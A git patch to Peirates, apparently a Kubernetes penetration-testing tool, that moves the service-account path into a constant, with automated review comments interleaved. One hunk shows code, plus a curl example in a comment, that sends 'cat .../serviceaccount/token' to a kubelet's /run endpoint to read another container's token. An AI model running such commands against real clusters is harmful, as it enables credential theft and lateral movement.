From 2ea78bba11a28b59e23ca6909fb1b6940bb9009f Mon Sep 17 00:00:00 2001
From: Jay Beale
Date: Thu, 13 Aug 2020 12:19:44 -0700
Subject: [PATCH] Set service account path to a const.
---
 config.go | 9 ++++++---
 peirates.go | 4 +---
 2 files changed, 7 insertions(+), 6 deletions(-)
diff --git a/config.go b/config.go
index 661ef2e..b008a04 100644
--- a/config.go
+++ b/config.go
@@ -8,6 +8,8 @@ import (
 "os"
 )
+const ServiceAccountPath = "/var/run/secrets/kubernetes.io/serviceaccount/"
+
 type ServerInfo struct {
 RIPAddress string
 RPort string
@@ -27,7 +29,8 @@ func ParseLocalServerInfo() ServerInfo {
 configInfoVars.RPort = os.Getenv("KUBERNETES_SERVICE_PORT")
 // Reading token file and storing in variable token
- token, errRead := ioutil.ReadFile("/run/secrets/kubernetes.io/serviceaccount/token")
+ const tokenFile = ServiceAccountPath + "token"
+ token, errRead := ioutil.ReadFile(tokenFile)
 configInfoVars.Token = string(token)
 //Error message If statement based on failure to read the file
@@ -36,7 +39,7 @@ func ParseLocalServerInfo() ServerInfo {
 }
 // Reading namespace file and storing in variable namespace
- namespace, errRead := ioutil.ReadFile("/run/secrets/kubernetes.io/serviceaccount/namespace")
+ namespace, errRead := ioutil.ReadFile(ServiceAccountPath + "namespace")
 if errRead != nil {
 fmt.Println("Namespaces location error", errRead)
 }
@@ -46,7 +49,7 @@ func ParseLocalServerInfo() ServerInfo {
 configInfoVars.TokenName = "Pod ns:" + configInfoVars.Namespace + ":" + os.Getenv("HOSTNAME")
 //Reading Ca.Crt File and storing in variable caCrt
- configInfoVars.CAPath = "/run/secrets/kubernetes.io/serviceaccount/ca.crt"
+ configInfoVars.CAPath = ServiceAccountPath + "ca.crt"
 return configInfoVars
 }
diff --git a/peirates.go b/peirates.go
index 4760b5b..2ab3bd6 100644
--- a/peirates.go
+++ b/peirates.go
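Review bot: The exported constant `ServiceAccountPath` added in the first config.go hunk has no doc comment, and its value is not the one it replaces. The three literals removed from ParseLocalServerInfo (hunks at -27, -36 and -46) all began with `/run/secrets/...`, while the constant begins with `/var/run/secrets/...`, so the token, namespace and ca.crt reads all move to a different path even though the subject line describes only a refactor. `/var/run/secrets/kubernetes.io/serviceaccount` is the default mount path Kubernetes documents, so the new value is probably the more portable one, since the old path presumably relied on the image linking /var/run to /run. I would say so in the commit message and add `// ServiceAccountPath is the default directory where Kubernetes mounts a pod's service account token, namespace and CA certificate; it ends in a slash so file names can be appended.`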
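Review bot: In the config.go hunk at -27 the token path gets a one-use local `const tokenFile`, while the namespace and ca.crt hunks (-36 and -46) concatenate inline, so the same function now builds three sibling paths in two different ways. All three also depend on the constant keeping its trailing slash. Using one form throughout, for example `ioutil.ReadFile(filepath.Join(ServiceAccountPath, "token"))`, removes that dependency. It needs `path/filepath` in config.go's import block, which is only partly visible here. ParseLocalServerInfo starts and ends outside this hunk.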
@@ -885,8 +885,7 @@ func ExecuteCodeOnKubelet(connectionString ServerInfo, ServiceAccounts *[]Servic
 // curl -sk https://10.23.58.41:10250/run/" + podNamespace + "/" + podName + "/" + containerName + "/ -d \"cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token\""
 data := url.Values{}
- data.Set("cmd", "cat /var/run/secrets/kubernetes.io/serviceaccount/token")
- // data.Set("cmd", "hostname")
+ data.Set("cmd", "cat "+ServiceAccountPath+"token")
 urlExecPod := "https://" + addr.Address + ":10250/run/" + podNamespace + "/" + podName + "/" + containerName + "/"
@@ -983,7 +982,6 @@ Interrogate/Abuse Cloud API's |
 --------------------------------+
 [17] List AWS S3 Buckets accessible (Auto-Refreshing Metadata API credentials) [aws-s3-ls]
 [18] List contents of an AWS S3 Bucket (Auto-Refreshing Metadata API credentials) [aws-s3-ls-objects]
-
 -----------+
 Compromise |
 -----------+
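Review bot: In the first peirates.go hunk, `ServiceAccountPath` now names a path in two different filesystems without saying so. In config.go it is read inside the pod running this program, while in `data.Set("cmd", "cat "+ServiceAccountPath+"token")` it is interpolated into a command string that the request hands to another container. Both uses hold only while the default mount location applies; a pod that sets `automountServiceAccountToken: false` or projects its token to a custom path has no file there. A comment above the call would make that explicit, for example `// assumes the target container uses the default service account mount path`. ExecuteCodeOnKubelet starts and ends outside this hunk, so how the response is handled is not visible here.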